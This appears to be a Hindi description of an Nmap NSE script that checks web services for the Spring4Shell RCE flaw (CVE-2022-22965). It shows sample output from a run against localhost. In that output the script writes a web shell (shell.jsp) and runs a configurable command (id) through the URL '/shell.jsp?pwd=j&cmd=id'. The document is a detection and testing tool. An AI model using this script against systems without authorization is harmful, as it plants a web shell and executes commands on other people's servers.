
Spring Boot RCE (CVE-2022-22965) के लिए Nmap Spring4Shell NSE स्क्रिप्ट
Log4shell-nmap एक NSE स्क्रिप्ट है जो HTTP सेवाओं में Spring4Shell RCE कमजोरियों (CVE-2022-22965) का पता लगाने के लिए है। यह स्क्रिप्ट एप्लिकेशन में सही पेलोड इंजेक्ट करती है और फिर निर्दिष्ट एंडपॉइंट पर निम्न कमांड निष्पादित करती है।
यहाँ देखें।
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
हम स्क्रिप्ट में कई वेरिएबल का उपयोग कर सकते हैं। ये इस प्रकार हैं:
endpoint - सापेक्ष URL। https://bugspace.pl/search/videos पर यह /search/videos होगा,command - सर्वर पर चलाया जाने वाला कमांड। डिफ़ॉल्ट कमांड id है,assertion - सर्वर प्रतिक्रिया के भीतर जाँची गई स्ट्रिंग। डिफ़ॉल्ट assertion uid है,filename - सर्वर पर फ़ाइल का नाम। अधिक जानकारी के लिए यहाँ देखें। डिफ़ॉल्ट नाम shell है।यहाँ और यहाँ से एप्लिकेशन पर परीक्षण किया गया।
Nmap के समान। देखें https://nmap.org/book/man-legal.html